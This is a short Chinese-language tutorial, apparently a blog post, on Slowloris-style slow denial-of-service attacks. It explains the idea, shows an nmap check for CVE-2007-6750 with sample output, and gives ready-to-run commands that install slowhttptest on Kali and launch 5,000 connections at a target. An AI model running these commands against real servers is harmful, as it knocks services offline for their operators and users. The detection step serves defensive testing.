??什么是缓慢DOS攻击

​并非所有的DOS攻击都是以大流量进行攻击，而缓慢DOS攻击中的“慢”，自然相对于这些“快”。通俗些来说，就是攻击者向服务器发送多个并发TCP连接。服务器是在所有请求被完全接受后才会断开TCP连接，这些连接便以很低的速度发包。于是服务器资源被长期占用，无法处理其他正常用户的请求。自然就达成了DOS攻击的目的。且这种攻击模式相对廉价，只需一台普通PC即可，无需传统DOS攻击中需要结合肉鸡群做分布式DOS。

⚽检测

我们可以利用nmap工具直接扫描。命令如下：

nmap --script http-slowloris-check ip

返回结果如下：

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750

?利用

在kali中，我们直接按照工具  执行命令

apt-get install slowhttptest

exploit

slowhttptest -c 5000 -u [hostname/ip]

?总结

慢速ddos攻击，相对于其他的ddos就比较简单多了。但是效果也只能针对有此漏洞的目标。

更多精彩文章 欢迎关注我们